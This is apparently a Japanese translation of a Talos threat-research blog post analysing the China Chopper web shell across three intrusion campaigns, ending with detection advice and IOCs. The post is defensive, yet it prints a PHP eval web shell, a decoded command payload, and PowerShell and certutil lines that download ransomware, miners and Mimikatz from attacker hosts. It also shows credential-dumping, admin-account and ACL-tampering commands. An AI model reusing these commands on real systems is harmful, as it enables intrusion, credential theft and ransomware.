概要
一般的に、脅威は発見、報告、検出されると、時間の経過とともに消えていくものです。しかし China Chopper は、最初に発見されてから 9 年が経つ現在もアクティブで、被害を及ぼし続けています。China Chopper
は Web シェルです。攻撃者は標的のコントロールに必要なロジックをすべて含むクライアント側のアプリケーションを使用して、感染したシステムへのアクセスを維持できます。いくつかの脅威グループが China Chopper を使用している中、Talos では過去 2 年間に、この Web シェルを使ったさまざまなキャンペーンを確認してきました。その中から特にアクティブなキャンペーンを 3 つ選び、このブログ記事で紹介します。
Talos が China Chopper の詳しい調査を始めたきっかけは、セキュリティ企業である Cybereason 社からの報告です。電気通信事業者を狙った「Operation Soft Cell」と呼ばれる大規模な攻撃で China Chopper が使用された可能性がある、という内容のものでした。Cisco Talos では、2017 年 6 月からの 2 年間で China Chopper の活発なアクティビティを確認してきました。つまり作成から 9 年が経つ今も、大きな変更が加えられることなく China Chopper による攻撃が続いているのです。
China Chopper は手に入りやすいため、ほとんどの攻撃者が使用できます。つまり、China Chopper が使われたことだけを手がかりにして攻撃者グループを突き止めることは、ほぼ不可能です。
最近のキャンペーンでいまだに China Chopper が使われていることは、古い脅威が決して無くならないことを物語っています。インターネット上で防御する側にとっては、新しいマルウェアと古いマルウェアどちらの対策も必要なのです。
China Chopper とは
China Chopper は侵入先のシステムを遠隔操作できるツールです。標的となるシステムは Web サーバ アプリケーションを実行している必要があります。さまざまなプラットフォームで動作しますが、今回は、感染したホストを Windows のみに絞りました。China Chopper は、Leviathan や Threat Group-3390 のような国家による攻撃でも使用されてきましたが、実際には幅広いスキル レベルの攻撃者が確認されています。
調査では、China Chopper の Web シェルに感染したインターネット インフォメーション サービス(IIS)と Apache Web サーバ の両方が検出されました。China Chopper がインストールされた経緯についての追加データはありませんが、古いバージョンの Oracle WebLogic や WordPress などの Web アプリケーション フレームワークが、既知のリモートでのコード実行や意図しないファイルを読み込む攻撃の標的となった可能性があります。
攻撃者は、China Chopper のシンプルな GUI を使って接続先サーバを構成でき、通信するためにターゲットの Web サイトのコードに追加する必要があるサーバ側コードを生成できます。
China Chopper の GUI
サーバ側のコードは非常にシンプルで、アプリケーション プラットフォームによっては、コードが 1 行のみです。バックドアは .NET Active Server Page または PHP をサポートします。
以下は、感染した PHP アプリケーションのサーバ側コードの例です。
<?php @eval($_POST['test']);?>
China Chopper の開発者が(検出を防ぐため)意図的にサーバ コードを単純にしたのかはわかりませんが、このような短いスニペットをパターン照合すると誤検出が発生する可能性があります。
China Chopper クライアントは HTTP POST 要求を使って、攻撃対象のサーバと通信します。サーバ側コードの唯一の関数は、クライアント GUI でサーバ コードを設定中に指定された要求パラメータを評価するものです。この例で予想されるパラメータ名は「test」です。HTTP 経由の通信は、ネットワーク パケット キャプチャで簡単に特定できます。
China Chopper には、「netstat an|find “ESTABLISHED”」という最初の推奨コマンドがあるリモート シェル(仮想端末)機能が含まれています。このコマンドは、影響を受けるシステムのプロセス生成ログに高い確率で表示されます。
China Chopper の最初の推奨ターミナル コマンド
パケット キャプチャを分析すると、パラメータの「test」に別の eval ステートメントが含まれていることがわかります。
コマンドに応じて、クライアントは z0 から zn までの数のパラメータを送信します。すべてのパラメータは、送信前に標準規格である base64 エンコーダでエンコードされます。パラメータ z0 には、他のパラメータを解析し、要求されたコマンドを起動してクライアントに結果を返すコードが必ず含まれます。
test=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYX lfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2V jaG8oIi0%2BfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1 BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQ sMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRy LiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtka WUoKTs%3D&z1=Y21k&z2=Y2QgL2QgIkM6XHhhbXBwXGh0ZG9jc1xkYXNoYm9hcmRcIiZuZXRzdGF0IC1hbiB8 IGZpbmQgIkVTVEFCTElTSEVEIiZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D
パラメータ付きのエンコードされた China Chopper POST 要求
以下は、この要求でデコードされたパラメータです。
z0 -
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("
->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER
["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p}
{$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1 - cmd
z2 - cd /d "C:\xampp\htdocs\dashboard\"&netstat -an | find "ESTABLISHED"&echo [S]&cd&echo [E]
コマンドの末尾の「&echo [S]&cd&echo [E]」は、仮想端末への全要求に共通しているようです。パケット キャプチャや動作ログ内で China Chopper のアクティビティを検出するための信頼性の高いインジケータとして使用されている可能性があります。
ターミナルの他に、China Chopper にはファイル マネージャ(ディレクトリの作成、ファイルのダウンロード、ファイル メタデータの変更が可能)、データベース マネージャ、初歩的な脆弱性スキャナが含まれています。
以下は、目的、ツール、手法、そしておそらく攻撃者も異なる 3 件の感染事例に関する Talos の見解です。
観察されたケース スタディのタイムライン
ケース スタディ 1:スパイ目的
いくつかのスパイ キャンペーンにおいて、China Chopper の使用が特定されました。ここでは、アジアの政府機関を標的とした攻撃について調査します。攻撃では China Chopper が内部ネットワークで使用され、機密文書の保管に使用されるいくつかの Web サーバにインストールされました。
攻撃者の目的は、ドキュメントとデータベースの中身を取得することでした。ドキュメントは、以下のように WinRAR を使用して自動的に圧縮されます。
cd /d C:\Windows\Working_Directory\ renamed_winrar a -m3 -hp19_Characters_Complex_Password -ta[date] -n*.odt -n*.doc -n*.docx -n*.pdf -n*.xls -n*.xlsx -n*.ppt -n*.pptx -r c:\output_directory\files.rar c:\directory_to_scan\
このコマンドは、引数(入力された日付)の後に変更されたドキュメントを含むアーカイブの作成に使われます。アーカイブは、大文字、小文字、特殊記号を含む強力なパスワードで保護されます。実際のパスワードの長さは 15 文字を超えていました。
攻撃者は定期的にこのコマンドを実行することで、新しいドキュメントのみを取得し、持ち出すデータ量を最小限に抑えていたと考えられます。
同じターゲット上で、WinRAR を使用して China Chopper で実行された追加コマンドが特定されました。
rar a -inul -ed -r -m3 -taDate -hp<profanity> ~ID.tmp c:\directory_to_scan
China Chopper は公開されているハッキング ツールであるため、今回の攻撃者が以前と同じ人物かどうかは判断できません。しかし、この rar コマンド ラインには、別の攻撃者である可能性を示す十分な違いがあります。パスワードに侮蔑的な表現が使用されていたため、ここでは表示していません。
攻撃者はシステム上でコマンドを実行するため、以下の追加ツールを導入しました。
C:\windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\windows\temp\Document.csproj /p:AssemblyName=C:\windows\temp\downloader.png /p:ScriptFile=C:\windows\temp\downloader.dat /p:Key=27_characters_key > random.tmp
MSBuild .exe は 2 つの引数を設定して、.NET アプリケーションのコンパイルと実行に使用されます。ScriptFile 引数には、key 引数の値で暗号化された PowerShell スクリプトが含まれます。以下に .NET コードを示します。
.NET ローダーのコード
.NET ローダーは、暗号化されたファイルまたは URL をスクリプト引数としてサポートします。オペレータが HTTP 要求を使用する場合、ローダーはハードコードされた User-Agent のいずれかでペイロードをダウンロードし、ダウンロードしたファイルを以下のように復号して実行します。
ハードコードされた User-Agent の文字列
今回のケースにおけるペイロード復号化の目的は、データベース ダンプを実行することでした。
powershell.exe -exe bypass -nop -w hidden -c Import-Module C:\windows\help\help\helper.ps1; Run-MySQLQuery -ConnectionString 'Server=localhost;Uid=root;Pwd=;database=DBName; Convert Zero Datetime=True' -Query 'Select * from table where UID > 'Value' -Dump
SQL クエリの「where UID」条件の目的は、前述の WinRAR コマンドの日付と同じです。攻撃者は定期的にクエリを実行し、データベース全体をダンプするのではなく、新しいエントリのみを取得すると考えられます。データをダンプした後に、生成されたファイルが使用可能かどうか、およびデータが含まれているかどうかを攻撃者が以下のように確認します。
dir /O:D c:\working_directory\db.csv powershell -nop -exec bypass Get-Content "c:\working_directory\db.csv" | Select-Object -First 10
ファイルのアーカイブとデータベースのダンプは、どのように持ち出されるのでしょうか。ターゲット サーバは内部ネットワーク上にあるため、単にローカル ドライブをマッピングしてファイルをそのドライブにコピーすればよいのです。
cd /d C:\working_directory\ net use \192.168.0.10\ipc$ /user:USER PASSWORD move c:\working_directory\db.csv \192.168.0.10\destination_directory
ただしデータを持ち出すには、リモート システムにアクセスできなければなりません。すでに確認したとおり、HTTP トンネル ツールを使用して、感染したシステムと C2 サーバ間のネットワーク トンネルを作成します。
ケース 2:多目的キャンペーン
次は、レバノンにある組織を標的としたキャンペーンについて説明します。最初のケースでは、内部サーバに影響を与えるデータ漏洩を目的とした標的型キャンペーンについて取り上げましたが、このケースはその反対です。異なる目的を持つ複数の攻撃者によって感染した補助的な公開 Web サイトについて説明します。
Talos では、China Chopper を使用して脆弱なサーバにランサムウェアを展開しようとしている攻撃者を特定しました。まず攻撃者が展開しようとしたのは Sodinokibi ランサムウェアでした。
certutil.exe -urlcache -split -f hxxp://188.166.74[.]218/radm.exe C:\Users\UserA\AppData\Local\Temp\radm.exe
2 番目は Gandcrab ransomware
です。
If($ENV:PROCESSOR_ARCHITECTURE -contains 'AMD64'){
Start-Process -FilePath "$Env:WINDIR\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
-argument "IEX ((new-object
net.webclient).downloadstring('https://pastebin.com/raw/Hd7BmJ33'));
Invoke-ACAXGZFTTDUDKY;
Start-Sleep -s 1000000;"
} else {
IEX ((new-object net.webclient).downloadstring('https://pastebin.com/raw/Hd7BmJ33'));
Invoke-ACAXGZFTTDUDKY;
Start-Sleep -s 1000000;
}
以下に、Pastebin でホストされるスクリプトを示します。
pastebin.com からダウンロードされたリフレクティブ ローダー
スクリプトは、リフレクティブ DLL ロード手法を使用して、スクリプトの末尾にある Gandcrab というハードコードされた PE ファイルを実行します。
ランサムウェアの他に、China Chopper を利用して、脆弱なサーバ上で Monero マイナーを実行しようとしている別の攻撃者も特定されました。
Powershell -Command -windowstyle hidden -nop -enc -iex(New-Object
Net.WebClient).DownloadString('hxxp://78.155.201[.]168:8667/6HqJB0SPQqbFbHJD/init.ps1')
Monero マイナーの設定は以下のとおりです。
Monero マイナーの設定
検出されたアクティビティの一部は、OS の認証情報を取得するために手動で実行された可能性があります。
以下のようにレジストリの取得を試みます。
reg save hklm\sam sam.hive reg save hklm\system system.hive reg save hklm\security security.hive
Mimikatz を使用します(途中で何度か障害が発生しています)。
powershell IEX (New-Object
Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/
PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');
Invoke-Mimikatz >>c:\1.txt
————-
powershell IEX","(New-Object",
"Net.WebClient).DownloadString('hxxp://is[.]gd/oeoFuI');
Invoke-Mimikatz -DumpCreds
C:\Windows\System32WindowsPowerShell\v1.0\powershell.exe IEX
(New-Object","Net.WebClient).DownloadString('https://raw.githubusercontent.commattifestation/
PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');
Invoke-Mimikatz
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe [Environment]::Is64BitProcess
powershell.exe IEX (New-Object Net.WebClient).
DownloadString('https://raw.githubusercontent.com/mattifestation/
PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');
Invoke-Mimikatz >>c:\1.txt
PowerShell モジュールとコマンド ラインを使用して、パスワード ハッシュのダンプを試みます。
IEX (New-Object
Net.WebClient).DownloadString('https://raw.githubusercontent.com/klionsec/CommonTools/
master/Get-PassHashes.ps1');Get-PassHashes;
メモリに保存されているローカルの認証情報を取得するために、攻撃者は lsass.exe に対して procdump64.exe の実行を試しました。認証情報のダンプを何度も試行するだけでなく、スペースの挿入漏れ、コマンドの誤り、文字の切り替えなどのタイプミスに対処する必要がありました。
いずれかの攻撃者が認証情報の取得に成功し、認証情報と「net use」コマンドを使用して内部に侵入しようとしました。
最終的には、純粋に PowerShell に書き込まれたリモート シェルだけでなく、Gh0stRAT や Venom マルチホップ プロキシなどの複数のリモート アクセス ツールがマシンに展開されました。
ケース 3:Web ホスティング プロバイダーの感染
あるキャンペーンでは、アジアの Web ホスティング プロバイダーが攻撃を受け、10 ヵ月間にわたって複数の Windows サーバへの広範囲な感染が確認されました。ここでも同様に、攻撃されたサーバによってアクティビティが異なるため、1 人の攻撃者か複数のグループによる攻撃かは判断できません。観察されたアクティビティのサブセットのみを示します。
サーバ 1
通常、攻撃者は新しいユーザを作成し、管理者権限を持つユーザ グループにそのユーザを追加しようとします。これは、1 台の物理サーバでホストされている他の Web アプリケーションにアクセスして修正するためであると推定されます。
cd /d C:\compromisedappdirectory&net user user pass /add cd /d C:\compromisedappdirectory&net localgroup administrattors user /add
「administrators(管理者)」という単語のスペルが間違っていることに注目してください。攻撃者は、ユーザの追加に失敗したことがわかり、別の手法を試みます。実行可能ファイルと微修正したパスワード盗用ツール「Mimikatz Lite」のソースコードを含むアーカイブを GetPassword.exe としてダウンロードし、インストールします。
このツールで、取得したパスワードを検索、復号、表示するために、Local Security Authority Subsystem(ローカル セキュリティ機関サブシステム)のメモリ領域を調査します。攻撃者が元のツールから変更したのは、コマンド ウィンドウの色とコード ページのみです。黒い背景に緑色のテキストが表示されるよう色が変更され、アクティブなコンソール コード ページが中国語のコード ページ 936 に変更されています。
最後に、人気のモバイル ゲーム「Clash of Kings」のデータベースのダンプを試みます。このゲームはプライベート サーバでホストされている可能性があります。
サーバ 2
攻撃者は 2 台目のサーバで China Chopper のテストに成功し、アクティビティを終了しました。しかし、私たちは China Chopper に感染した他のシステムで市販のマルウェアを発見したように、別の Monero 暗号通貨マイナーも発見しました。
まず、攻撃者は Windows の一時ファイル フォルダのアクセス コントロール リストをリセットし、フォルダの所有権を取得します。次に、Windows ファイアウォールでマイナー実行可能ファイルを許可し、最後にマイニング ペイロードを起動します。
C:\Windows\system32\icacls.exe C:\Windows\Temp /Reset /T C:\Windows\system32\takeown.exe /F C:\Windows\Temp C:\Windows\system32\netsh.exe Firewall Add AllowedProgram C:\Windows\Temp\lsass.eXe Windows Update Enable C:\Windows\Temp\lsass.eXe
サーバ 3
公開および非公開ツールをいくつかダウンロードすると、このサーバへの攻撃が始まりますが、ツールを取得することはできませんでした。
攻撃者は、CVE-2018–8440(Windows が Advanced Local Procedure Call に対するコールを適切に処理できないことに起因する権限昇格の脆弱性)を悪用し、修正した概念実証段階のエクスプロイトを使用して権限を昇格しようとします。
cd /d C:\directoryofcompromisedapp&rundll32 C:\directoryofcompromisedapp\ALPC-TaskSched-LPE.dll,a
攻撃者は、新規ユーザの iis_uses の作成と DACL の変更を試みるカスタム ツールや既存のツールを起動して、作成したユーザが特定のオペレーティング システム オブジェクトを修正できるようにします。
必要な権限を取得し、他のいくつかのツールを起動して、影響を受けるサーバで実行されているすべての Web サイトのアクセス コントロール リスト(ACL)を修正します。これは、他のサイトの感染や Web 改ざんキャンペーンのために行われる可能性があります。
cacls \. C:\path_to_a_website /T /E /C /G Everyone:F
最後に、Powershell Mimikatz ローダーを起動して、メモリからさらに認証情報を取得し、テキスト ファイルに保存しようと試みます。
powershell -nop -exec bypass -c IEX (New-Object
Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/
master/Invoke-Mimikatz/Invoke-Mimikatz.ps1');Invoke-Mimikatz|Out-File
-Encoding ASCII outputfile.txt
サーバ 4
China Chopper 攻撃者のアクティビティは、CVE-2015-0062、CVE-2015-1701、CVE-2016-0099 の Windows の脆弱性を突く 2 つのエクスプロイト ファイルをダウンロードして、実行すると始まり、攻撃者がサーバ上の他のオブジェクトを修正できるようになります。
権限昇格が成功すると、新しいユーザ アカウントを追加し、そのアカウントを管理グループに追加します。
net user admin admin /ad net localgroup administrators admin /ad
次に、新たに作成したユーザ アカウントでサーバにログオンし、無料ツール replacestudio32.exe(テキストベースのファイルを簡単に検索して別の文字列で置換できる GUI ユーティリティ)を起動します。繰り返しになりますが、サーバでホストされているすべてのサイトに影響を与えるか、単にページを改ざんするために使用できます。
まとめ
安全性の低い Web アプリケーションは、攻撃者にとって有効な侵入経路となります。Web シェルなどの追加ツールをインストールして偵察を行い、他のシステムへの突破口にもなります。
China Chopper は古いツールですが、さまざまな目的とスキル レベルを持つ攻撃者によって使用されてきました。この記事では、3 つの異なる侵害事例で使用された一般的なツール、手法、プロセスをいくつか紹介しました。簡単に使用できるため、特定の攻撃者やグループに結びつけることは不可能です。
Talos の調査レポートでは、数ヵ月間で検出した 3 件のキャンペーンについて記載しています。これは、侵入を検出する平均時間が 180 日以上であるという主張を裏付けています。組織がすでに侵害されているという前提で、セキュリティ チームとプロセスを構築する必要があることを示しています。インシデント対応チームには、自動検出システムによって発生したアラートに対応したり、第一線のセキュリティ アナリストからのエスカレーションを受けたりするだけでなく、侵害をプロアクティブに検出する権限も必要です。
インフラストラクチャの保護に関しては、既知のエクスプロイトによる感染のリスクを軽減するために、最新のセキュリティ パッチを適用して、内部だけでなく外部の Web サーバ、アプリケーション、フレームワークを最新の状態に維持することが重要です。
最初に発見されてから年数が経っているにもかかわらず、China Chopper はいまだに使用されています。そして、今後も脅威であり続けるでしょう。
カバレッジ
SNORT® などの侵入防御システムは、各コマンドの末尾にある特定のシグニチャによって、China Chopper のアクティビティを検出するための効果的なツールを提供します。侵入防御システムに加えて、Cisco AMP for Endpoints などのエンドポイントの検出および対応ツール(EDR)を使用することをお勧めします。これにより、プロセスの呼び出しを追跡し、プロセスを検査できます。こちらから AMP を無料でお試しいただけます。
これらの脅威を検出してブロックする別の方法を以下に記載します。
Advanced Malware Protection(AMP)は、これらの攻撃者によるマルウェアの実行の阻止に最適です。
Cisco クラウド Web セキュリティ(CWS)または Web セキュリティ アプライアンス(WSA)の Web スキャンは、悪意のある Web サイトへのアクセスを防止し、これらの攻撃で使用されるマルウェアを検出します。
電子メール セキュリティは、攻撃の一環として攻撃者が送りつける不正な電子メールをブロックします。
次世代ファイアウォール(NGFW)、次世代侵入防止システム(NGIPS)、およびMeraki MX などのネットワーク セキュリティ アプライアンスは、この脅威に関連する悪意のあるアクティビティを検出できます。
AMP Threat Grid は、悪意のあるバイナリを特定し、すべてのシスコ セキュリティ製品に保護機能を埋め込みます。
シスコのセキュア インターネット ゲートウェイ(SIG)である Umbrella は、社内ネットワークの内外で悪意のあるドメイン、IP、URL への接続をブロックします。
オープン ソースのSNORTⓇサブスクライバ ルール セットをお使いであれば、Snort.org で購入可能な最新のルール パックをダウンロードすることで、システムを最新状態に維持できます。
IOC(侵入の痕跡)
China Chopper クライアント
9065755708be18d538ae1698b98201a63f735e3d8a597419588a16b0a72c249a
c5bbb7644aeaadc69920de9a31042920add12690d3a0a38af15c8c76a90605ef
b84cdf5f8a4ce4492dd743cb473b1efe938e453e43cdd4b4a9c1c15878451d07
58b2590a5c5a7bf19f6f6a3baa6b9a05579be1ece224fccd2bfa61224a1d6abc
ケース スタディ 1
ファイル
b1785560ad4f5f5e8c62df16385840b1248fe1be153edd0b1059db2308811048 – ダウンローダ
fe6b06656817e288c2a391cbe8f5c7f1fa0f0849d9446f9350adf7100aa7b447 – プロキシ
28cbc47fe2975fbde7662e56328864e28fe6de4b685d407ad8a2726ad92b79e5 – ダウンローダ dll
c9d5dc956841e000bfd8762e2f0b48b66c79b79500e894b4efa7fb9ba17e4e9e – nbtscan ツール
dbe8ada2976ee00876c8d61e5a92cf9c980ae4b3fce1d9016456105a2680776c – マイナー
正当なツール
d76c3d9bb0d8e0152db37bcfe568c5b9a4cac00dd9c77c2f607950bbd25b30e0 – rar
46c3e073daa4aba552f553b914414b8d4419367df63df8a0d2cf4db2d835cdbd – 名前を変更した rar
96f478f709f4f104822b441ae3fa82c95399677bf433ac1a734665f374d28c84 – 名前を変更した rar
IP アドレス
69.165.64.100
59.188.255.184
154.211.12.153
185.234.218.248
ケース スタディ 2
ファイル
02d635f9dfc80bbd9e8310606f68120d066cec7db8b8f28e19b3ccb9f4727570 – Gandcrab ローダー
1c3d492498d019eabd539a0774adfc740ab62ef0e2f11d13be4c00635dccde33 – Gandcrab
219644f3ece78667293a035daf7449841573e807349b88eb24e2ba6ccbc70a96 – マイナー/ドロッパー
4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38 – マイナーにドロップされた massscan
a06d135690ec5c5c753dd6cb8b4fe9bc8d23ca073ef9c0d8bb1b4b54271f56bb – リモート エクスプロイト
919270ef1c58cc032bb3417a992cbb676eb15692f16e608dcac48e536271373a – マルチホップ Venom プロキシ
URL
hxxp://101.78.142.74:8001/xavg/javae[.]exe
hxxp://107.181.160.197/win/3p/checking[.]ps1
hxxp://107.182.28.64/t0[.]txt
hxxp://139.180.199.167:1012/update[.]ps1
hxxp://172.96.241.10:80/a
hxxp://185.228.83.51/config[.]c
hxxp://188.166.74.218/radm[.]exe
hxxp://188.166.74.218/untitled[.]exe
hxxp://198.13.42.229:8667/6HqJB0SPQqbFbHJD/init[.]ps1
hxxp://202.144.193.177/1[.]ps1
hxxp://43.245.222.57:8667/6HqJB0SPQqbFbHJD/init[.]ps1
hxxp://78.155.201.168:8667/6HqJB0SPQqbFbHJD/init[.]ps1
hxxp://is.gd/oeoFuI
hxxps://pastebin.com/raw/Hd7BmJ33
hxxps://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz[.]ps1
hxxp://fid.hognoob.se/download[.]exe
hxxp://107.182.28.64/t0[.]txt
hxxp://uio.hognoob.se:63145/cfg[.]ini
hxxp://fid.hognoob.se/HidregSvc[.]exe
hxxp://188.166.74.218/untitled[.]exe
hxxp://45.55.211.79/.cache/untitled[.]exe
hxxp://188.166.74.218/untitled[.]exe
IP アドレス
185.234.218.248
ケース スタディ 3
ファイル:
fe2f0494e70bfa872f1aea3ec001ad924dd868e3621735c5a6c2e9511be0f4b0 – Mini Mimikatz アーカイブ
2e0a9986214c4da41030aca337f720e63594a75754e46390b6f81bae656c2481 – CVE-2015-0062
f3a869c78bb01da794c30634383756698e320e4ca3f42ed165b4356fa52b2c32 – CVE-2015-1701/CVE-2016-0099
b46080a2446c326cc5f574bdd34e20daad169b535adfda97ba83f31a1d0ec9ab – ユーザの追加と権限昇格のためのツール
ab06f0445701476a3ad1544fbea8882c6cb92da4add72dc741000bc369db853f – 改ざんサイトを編集するための ACL
正当なツール:
ee31b75be4005290f2a9098c04e0c7d0e7e07a7c9ea1a01e4c756c0b7a342374 – Replace Studio
d1c67e476cfca6ade8c79ac7fd466bbabe3b2b133cdac9eacf114741b15d8802 – Replace Stu
本稿は 2019年8月27日に Talos Group
Authors